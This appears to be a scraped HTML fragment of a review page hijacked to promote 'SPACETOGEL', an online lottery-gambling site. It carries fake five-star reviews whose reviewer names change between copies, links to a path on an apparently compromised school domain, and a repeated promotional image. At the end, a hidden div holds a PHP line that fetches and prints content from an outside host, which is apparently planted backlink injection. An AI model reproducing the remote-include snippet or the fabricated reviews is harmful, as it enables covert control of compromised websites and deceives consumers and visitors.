            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="2"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="3"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="4"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
    </span>
        <span class="wt-text-title wt-nudge-l-3 wt-nudge-t-1">
            5
        </span>
</span>
                        <span data-clg-id="WtBadge" class="wt-badge wt-badge--default wt-badge--small wt-badge--border">
        This item

</span>
                            <span class="wt-bl-xs wt-mr-xs-1 wt-ml-xs-1 wt-nudge-t-1 wt-nudge-r-1"></span>
                            <span class="wt-text-body-smaller">
        <span class="wt-icon wt-fill-slime wt-icon--smallest-xs wt-nudge-b-1 wt-nudge-r-2"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M9.059 20.473 21.26 6.15l-1.52-1.298-10.8 12.675-4.734-4.734-1.414 1.414z"/></svg></span>Recommends
</span>
                    </div>
                    <div class="wt-hide-xs wt-show-md wt-mb-xs-1">
                        <div class="wt-display-flex-xs wt-align-items-center">
        <span class="wt-icon wt-icon--smaller-xs wt-mr-xs-1 wt-flex-shrink-xs-0"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false">
  <path d="M12 24c6.627 0 12-5.373 12-12S18.627 0 12 0 0 5.373 0 12s5.373 12 12 12z" fill="#CCEBFF"/>
  <path d="M18.646 16.01c-.268-4.538-1.24-10.998-3.187-11.411-1.935-.414-7.932 2.19-11.156 6.277-1.095 1.387-.779 3.333.706 4.294 2.822 1.837 6.812 3.249 10.097 3.918 1.898.389 3.65-1.132 3.54-3.078z" fill="#4BC46D"/>
</svg></span>
    <p class="wt-text-body-small">
            <a href="https://ppschool.org.in/stella/"
            rel="nofollow"
            aria-label="Reviewer Melissa Kernan"
            class="wt-text-link-no-underline wt-text-title-small"
            data-review-username
            data-transaction-id="4677086143"
            >
        SPACETOGEL LOGIN</a>
        <span class="wt-bl-xs wt-mr-xs-1 wt-ml-xs-1 wt-nudge-t-1 wt-nudge-r-1"></span>
        Sep 14, 2025
    </p>
</div>
                    </div>
                </div>

                <div class="wt-display-flex-xs wt-flex-direction-row-xs wt-justify-content-space-between wt-align-items-flex-start">
                    <div class="wt-text-body">
                        <div class="max-height-review max-height-text-container is-long">
    <div data-review-text-toggle-wrapper>
<div data-clg-id="WtInlineToggle" class="wt-content-toggle--truncated-inline-multi wt-break-word wt-text-body">
    <div class="wt-content-toggle__trigger-wrapper">
        <button
                type="button"
                class="wt-content-toggle--ellipsis-btn"
                data-one-way="false"
                data-wt-content-toggle
                data-inline="multi"
                aria-controls="review-preview-toggle-01757443933"
        >
            <span class="etsy-icon wt-icon--base-xs"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><circle cx="12" cy="12.001" r="2.999"/><circle cx="3" cy="12.001" r="2.999"/><circle cx="21" cy="12.001" r="2.999"/></svg></span>
            <span class="wt-screen-reader-only">Listing review by SPACETOGEL LOGIN</span>
        </button>
    </div>

    <p id="review-preview-toggle-01757443933" class="wt-text-truncate--multi-line wt-break-word wt-text-body" >
      bermain togel di SPACETOGEL sangat mudah dan juga sistem deposit dan wd yang cepat, aman sekali untuk player baru seperti saya top deh pokonya SPACETOGEL

    </p>
</div>
    </div>
</div>
                    </div>
                </div>
                <div class="wt-show-xs wt-hide-md wt-mt-xs-3 wt-mb-xs-1">
                    <div class="wt-display-flex-xs wt-align-items-center">
        <span class="wt-icon wt-icon--smaller-xs wt-mr-xs-1 wt-flex-shrink-xs-0"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false">
  <path d="M12 24c6.627 0 12-5.373 12-12S18.627 0 12 0 0 5.373 0 12s5.373 12 12 12z" fill="#CCEBFF"/>
  <path d="M18.646 16.01c-.268-4.538-1.24-10.998-3.187-11.411-1.935-.414-7.932 2.19-11.156 6.277-1.095 1.387-.779 3.333.706 4.294 2.822 1.837 6.812 3.249 10.097 3.918 1.898.389 3.65-1.132 3.54-3.078z" fill="#4BC46D"/>
</svg></span>
    <p class="wt-text-body-small">
            <a href="https://ppschool.org.in/stella/"
            rel="nofollow"
            aria-label="Reviewer Joana Kernan"
            class="wt-text-link-no-underline wt-text-title-small"
            data-review-username
            data-transaction-id="4677086143"
            >SPACETOGEL LOGIN</a>
        <span class="wt-bl-xs wt-mr-xs-1 wt-ml-xs-1 wt-nudge-t-1 wt-nudge-r-1"></span>
        Sep 14, 2025
    </p>
</div>
                </div>

            </div>

            


        </div>
    </div>
</div><div class="wt-grid__item-xs-12 review-card" data-review-region="4706945066">
    <div class="wt-bb-xs wt-pt-xs-2 wt-pt-md-1 wt-pb-xs-2">
        <div class="min-width-0" id="review-text-width-1">
            <div class="wt-max-width-full">
                <div class="wt-display-flex-xs wt-flex-direction-row-xs wt-justify-content-space-between wt-flex-wrap wt-mb-xs-2 wt-mb-md-0">
                    <div class="wt-mb-xs-1">
                        <span class="wt-display-inline-block wt-mr-xs-1" data-stars-svg-container>
    <input type="hidden" name="initial-rating" value="5" />
    <input type="hidden" name="rating" value="5" />
    <span class="wt-screen-reader-only">5 out of 5 stars</span>

    <span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="0"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="1"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="2"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="3"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smaller wt-fill-beeswax" data-rating="4"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
    </span>
        <span class="wt-text-title wt-nudge-l-3 wt-nudge-t-1">
            5
        </span>
</span>
                        <span data-clg-id="WtBadge" class="wt-badge wt-badge--default wt-badge--small wt-badge--border">
        This item

</span>
                            <span class="wt-bl-xs wt-mr-xs-1 wt-ml-xs-1 wt-nudge-t-1 wt-nudge-r-1"></span>
                            <span class="wt-text-body-smaller">
        <span class="wt-icon wt-fill-slime wt-icon--smallest-xs wt-nudge-b-1 wt-nudge-r-2"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M9.059 20.473 21.26 6.15l-1.52-1.298-10.8 12.675-4.734-4.734-1.414 1.414z"/></svg></span>Recommends
</span>
                    </div>
                    <div class="wt-hide-xs wt-show-md wt-mb-xs-1">
                        <div class="wt-display-flex-xs wt-align-items-center">
        <span class="wt-icon wt-icon--smaller-xs wt-mr-xs-1 wt-flex-shrink-xs-0"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false">
  <path d="M12 24c6.627 0 12-5.373 12-12S18.627 0 12 0 0 5.373 0 12s5.373 12 12 12z" fill="#FFE0C3"/>
  <path d="M18.863 8.412c-3.8-1.6-7.713-2.9-11.713-3.912a133.96 133.96 0 00-2.4 9.887l7.025 5.113s6.1-3.063 7.237-3.813c.788-.524-.15-7.274-.15-7.274z" fill="#095E31"/>
</svg></span>
    <p class="wt-text-body-small">
            <a href="https://ppschool.org.in/stella/"
            rel="nofollow"
            aria-label="Reviewer Leslie Jimenez"
            class="wt-text-link-no-underline wt-text-title-small"
            data-review-username
            data-transaction-id="4706945066"
            >
        BANDAR TOGEL</a>
        <span class="wt-bl-xs wt-mr-xs-1 wt-ml-xs-1 wt-nudge-t-1 wt-nudge-r-1"></span>
        Sep 19, 2025
    </p>
</div>
                    </div>
                </div>

                <div class="wt-display-flex-xs wt-flex-direction-row-xs wt-justify-content-space-between wt-align-items-flex-start">
                    <div class="wt-text-body">
                        <div class="max-height-review max-height-text-container is-long">
    <div data-review-text-toggle-wrapper>
<div data-clg-id="WtInlineToggle" class="wt-content-toggle--truncated-inline-multi wt-break-word wt-text-body">
    <div class="wt-content-toggle__trigger-wrapper">
        <button
                type="button"
                class="wt-content-toggle--ellipsis-btn"
                data-one-way="false"
                data-wt-content-toggle
                data-inline="multi"
                aria-controls="review-preview-toggle-11757443933"
        >
            <span class="etsy-icon wt-icon--base-xs"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><circle cx="12" cy="12.001" r="2.999"/><circle cx="3" cy="12.001" r="2.999"/><circle cx="21" cy="12.001" r="2.999"/></svg></span>
            <span class="wt-screen-reader-only">Listing review by Lesley Jimenaz</span>
        </button>
    </div>

    <p id="review-preview-toggle-11757443933" class="wt-text-truncate--multi-line wt-break-word wt-text-body" >
        bandar togel terbaik si emang SPACETOGEL ini trusted deh main togel disini

    </p>
</div>
    </div>
</div>
              
                </div>

            </div>

            


        </div>
    </div>
</div>
        </div>
    </div>

        <div class="wt-display-flex-xs wt-justify-content-space-between wt-flex-wrap wt-flex-gap-xs-3 wt-mb-xs-5 wt-mb-lg-6">
                <nav data-clg-id="WtPagination" aria-label="Pagination">
    <div class="wt-action-group wt-list-inline wt-flex-no-wrap  " data-reviews-pagination="">
            <div class="wt-action-group__item-container">
                <a class="wt-action-group__item wt-btn wt-btn--small wt-btn--icon  wt-is-disabled"
                    
                    aria-disabled="true" role="link"
                    
                    
                >
                    <span class="wt-screen-reader-only">Previous page</span>
                    <span class="wt-icon wt-icon--smaller"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false">
  <path d="M6.7 11.3L6 12l.7.7 4 4c.4.4 1 .4 1.4 0 .4-.4.4-1 0-1.4L9.8 13H17c.6 0 1-.4 1-1s-.4-1-1-1H9.8l2.3-2.3c.2-.2.3-.4.3-.7 0-.6-.4-1-1-1-.3 0-.5.1-.7.3l-4 4z"/>
</svg></span>
                </a>
            </div>

            <div class="wt-action-group__item-container">
                    <a href="https://ppschool.org.in/stella/?ref=pagination&page=1" class="wt-action-group__item wt-btn wt-btn--small wt-pr-xs-2 wt-pl-xs-2 wt-is-selected"
                        aria-current="true"
                        
                        
                    >
                        <span>1</span>
                    </a>
            </div>
            <div class="wt-action-group__item-container">
                    <a href="https://ppschool.org.in/stella/?ref=pagination&page=2" class="wt-action-group__item wt-btn wt-btn--small wt-pr-xs-2 wt-pl-xs-2"
                        
                        data-page="2"
                        
                    >
                        <span>2</span>
                    </a>
            </div>
            <div class="wt-action-group__item-container">
                    <a href="https://ppschool.org.in/stella/?ref=pagination&page=3" class="wt-action-group__item wt-btn wt-btn--small wt-pr-xs-2 wt-pl-xs-2"
                        
                        data-page="3"
                        
                    >
                        <span>3</span>
                    </a>
            </div>
            <div class="wt-action-group__item-container">
                    <a href="https://ppschool.org.in/stella/?ref=pagination&page=4" class="wt-action-group__item wt-btn wt-btn--small wt-pr-xs-2 wt-pl-xs-2"
                        
                        data-page="4"
                        
                    >
                        <span>4</span>
                    </a>
            </div>
            <div class="wt-action-group__item-container">
                    <a href="https://ppschool.org.in/stella/?ref=pagination&page=5" class="wt-action-group__item wt-btn wt-btn--small wt-pr-xs-2 wt-pl-xs-2"
                        
                        data-page="5"
                        
                    >
                        <span>5</span>
                    </a>
            </div>


            <div class="wt-action-group__item-container">
                <a class="wt-action-group__item wt-btn wt-btn--small wt-btn--icon "
                    href="https://ppschool.org.in/stella/?ref=pagination&page=2"
                    
                    data-page="2"
                    
                >
                    <span class="wt-screen-reader-only">Next page</span>
                    <span class="wt-icon wt-icon--smaller"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false">
  <path d="M17.3 12.7l.7-.7-.7-.7-4-4c-.4-.4-1-.4-1.4 0s-.4 1 0 1.4l2.3 2.3H7c-.6 0-1 .4-1 1s.4 1 1 1h7.2l-2.3 2.3c-.2.2-.3.4-.3.7 0 .6.4 1 1 1 .3 0 .5-.1.7-.3l4-4z"/>
</svg></span>
                </a>
            </div>
    </div>
</nav>

<button data-clg-id="WtButton" class="wt-btn wt-btn--transparent wt-btn--small" id="shop-reviews-tab" data-wt-tab="shop">
                        Show other item reviews from SPACETOGEL

</button>
        </div>
        <div data-appears-component-name="customer_photos" data-appears-event-data='{"photos_count":20}'>
<div class="wt-grid__item-lg-12 customer-photos-carousel wt-mb-xs-6 wt-mb-lg-9 wt-pb-xs-1"
     data-customer-photos-section="shop"
     data-customer-photos-carousel
>
        <h3 class="wt-mb-xs-2 wt-text-body-01">
            Photos from reviews
        </h3>
    <div class="wt-position-relative wt-overflow-x-hidden wt-overflow-y-hidden">
        <button class="prev wt-btn wt-btn--filled wt-btn--light wt-btn--icon wt-position-left wt-position-absolute wt-display-block wt-z-index-2 wt-shadow-elevation-3 wt-ml-xs-2 wt-vertical-center" aria-label="previous">
            <span class="wt-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M16,21a0.994,0.994,0,0,1-.664-0.253L5.5,12l9.841-8.747a1,1,0,0,1,1.328,1.494L8.5,12l8.159,7.253A1,1,0,0,1,16,21Z"/></svg></span>
        </button>
        <button class="next wt-btn wt-btn--filled wt-btn--light wt-btn--icon wt-position-right wt-position-absolute wt-display-block wt-z-index-2 wt-shadow-elevation-3 wt-mr-xs-2 wt-vertical-center" aria-label="next">
            <span class="wt-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M8,21a1,1,0,0,1-.664-1.747L15.5,12,7.336,4.747A1,1,0,0,1,8.664,3.253L18.5,12,8.664,20.747A0.994,0.994,0,0,1,8,21Z"/></svg></span>
        </button>

        <div class="carousel-inner wt-grid wt-flex-nowrap wt-grid--block wt-pt-xs-1 wt-pb-xs-1">
            <div
    class="wt-flex-shrink-xs-0 wt-grid__item-xs-3 wt-grid__item-md-3"
    id="customer-photos-carousel-inner"
    
>
<button data-clg-id="WtButton" class="wt-btn wt-btn--transparent wt-p-xs-0 wt-rounded wt-overflow-hidden wt-width-full appreciation-focus" aria-controls="customer-photo-overlay-carousel" aria-label="View details of this review photo by Lolly" data-js-action="openReviewPhotoOverlay" data-transaction-id="4686671368" data-index="0" data-location="customer-photo-section" data-page="view_listing">
                <div class="wt-image-placeholder--1-1 wt-position-relative">
                <img
    data-clg-id="WtImage"
    class="wt-width-full wt-display-block wt-height-full wt-position-absolute wt-position-top wt-position-left wt-image--cover wt-image"
    src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0"
    alt="Lolly added a photo of their purchase"
    style="aspect-ratio: 1;"
    loading="lazy"
    sizes="(max-width: 479px) 100px, (max-width: 639px) 150px, (max-width: 899px) 200px, (max-width: 1199px) 150px, 200px"
    srcset="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 100w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 200w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 300w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 600w"
/>

            </div>

</button>
</div><div
    class="wt-flex-shrink-xs-0 wt-grid__item-xs-3 wt-grid__item-md-3"
    id="customer-photos-carousel-inner"
    
>
<button data-clg-id="WtButton" class="wt-btn wt-btn--transparent wt-p-xs-0 wt-rounded wt-overflow-hidden wt-width-full appreciation-focus" aria-controls="customer-photo-overlay-carousel" aria-label="View details of this review photo by chacejmcleish" data-js-action="openReviewPhotoOverlay" data-transaction-id="4699975020" data-index="1" data-location="customer-photo-section" data-page="view_listing">
                <div class="wt-image-placeholder--1-1 wt-position-relative">
                <img
    data-clg-id="WtImage"
    class="wt-width-full wt-display-block wt-height-full wt-position-absolute wt-position-top wt-position-left wt-image--cover wt-image"
    src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0"
    alt="chacejmcleish added a photo of their purchase"
    style="aspect-ratio: 1;"
    loading="lazy"
    sizes="(max-width: 479px) 100px, (max-width: 639px) 150px, (max-width: 899px) 200px, (max-width: 1199px) 150px, 200px"
    srcset="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 100w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 200w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 300w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 600w"
/>

            </div>

</button>
</div><div
    class="wt-flex-shrink-xs-0 wt-grid__item-xs-3 wt-grid__item-md-3"
    id="customer-photos-carousel-inner"
    
>
<button data-clg-id="WtButton" class="wt-btn wt-btn--transparent wt-p-xs-0 wt-rounded wt-overflow-hidden wt-width-full appreciation-focus" aria-controls="customer-photo-overlay-carousel" aria-label="View details of this review photo by chacejmcleish" data-js-action="openReviewPhotoOverlay" data-transaction-id="4699975020" data-index="1" data-location="customer-photo-section" data-page="view_listing">
                <div class="wt-image-placeholder--1-1 wt-position-relative">
                <img
    data-clg-id="WtImage"
    class="wt-width-full wt-display-block wt-height-full wt-position-absolute wt-position-top wt-position-left wt-image--cover wt-image"
    src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0"
    alt="chacejmcleish added a photo of their purchase"
    style="aspect-ratio: 1;"
    loading="lazy"
    sizes="(max-width: 479px) 100px, (max-width: 639px) 150px, (max-width: 899px) 200px, (max-width: 1199px) 150px, 200px"
    srcset="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 100w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 200w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 300w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 600w"
/>

            </div>

</button>
</div><div
    class="wt-flex-shrink-xs-0 wt-grid__item-xs-3 wt-grid__item-md-3"
    id="customer-photos-carousel-inner"
    
>
<button data-clg-id="WtButton" class="wt-btn wt-btn--transparent wt-p-xs-0 wt-rounded wt-overflow-hidden wt-width-full appreciation-focus" aria-controls="customer-photo-overlay-carousel" aria-label="View details of this review photo by Silje" data-js-action="openReviewPhotoOverlay" data-transaction-id="4624321020" data-index="2" data-location="customer-photo-section" data-page="view_listing">
                <div class="wt-image-placeholder--1-1 wt-position-relative">
                <img
    data-clg-id="WtImage"
    class="wt-width-full wt-display-block wt-height-full wt-position-absolute wt-position-top wt-position-left wt-image--cover wt-image"
    src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0"
    alt="Silje added a photo of their purchase"
    style="aspect-ratio: 1;"
    loading="lazy"
    sizes="(max-width: 479px) 100px, (max-width: 639px) 150px, (max-width: 899px) 200px, (max-width: 1199px) 150px, 200px"
    srcset="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 100w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 200w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 300w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 600w"
/>

            </div>
       </button>
     </div>
     
  <script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"version":"2024.11.0","token":"00e8e59558ca43b8a5da4e4b234eb4cd","r":1,"server_timing":{"name":{"cfCacheStatus":true,"cfEdge":true,"cfExtPri":true,"cfL4":true,"cfOrigin":true,"cfSpeedBrain":true},"location_startswith":null}}' crossorigin="anonymous"></script>
<!-- Code injected by live-server -->
<script>
	// <![CDATA[  <-- For SVG support
	if ('WebSocket' in window) {
		(function () {
			function refreshCSS() {
				var sheets = [].slice.call(document.getElementsByTagName("link"));
				var head = document.getElementsByTagName("head")[0];
				for (var i = 0; i < sheets.length; ++i) {
					var elem = sheets[i];
					var parent = elem.parentElement || head;
					parent.removeChild(elem);
					var rel = elem.rel;
					if (elem.href && typeof rel != "string" || rel.length == 0 || rel.toLowerCase() == "stylesheet") {
						var url = elem.href.replace(/(&|\?)_cacheOverride=\d+/, '');
						elem.href = url + (url.indexOf('?') >= 0 ? '&' : '?') + '_cacheOverride=' + (new Date().valueOf());
					}
					parent.appendChild(elem);
				}
			}
			var protocol = window.location.protocol === 'http:' ? 'ws://' : 'wss://';
			var address = protocol + window.location.host + window.location.pathname + '/ws';
			var socket = new WebSocket(address);
			socket.onmessage = function (msg) {
				if (msg.data == 'reload') window.location.reload();
				else if (msg.data == 'refreshcss') refreshCSS();
			};
			if (sessionStorage && !sessionStorage.getItem('IsThisFirstTime_Log_From_LiveServer')) {
				console.log('Live reload enabled.');
				sessionStorage.setItem('IsThisFirstTime_Log_From_LiveServer', true);
			}
		})();
	}
	else {
		console.error('Upgrade your browser. This Browser is NOT supported WebSocket for Live-Reloading.');
	}
	// ]]>
</script>
<div style="display:none;">
<?php
echo file_get_contents("https://kanjut-berdiri.info/assets/backlink.php");
?>
</body>
</div></html>

MMCT - 2023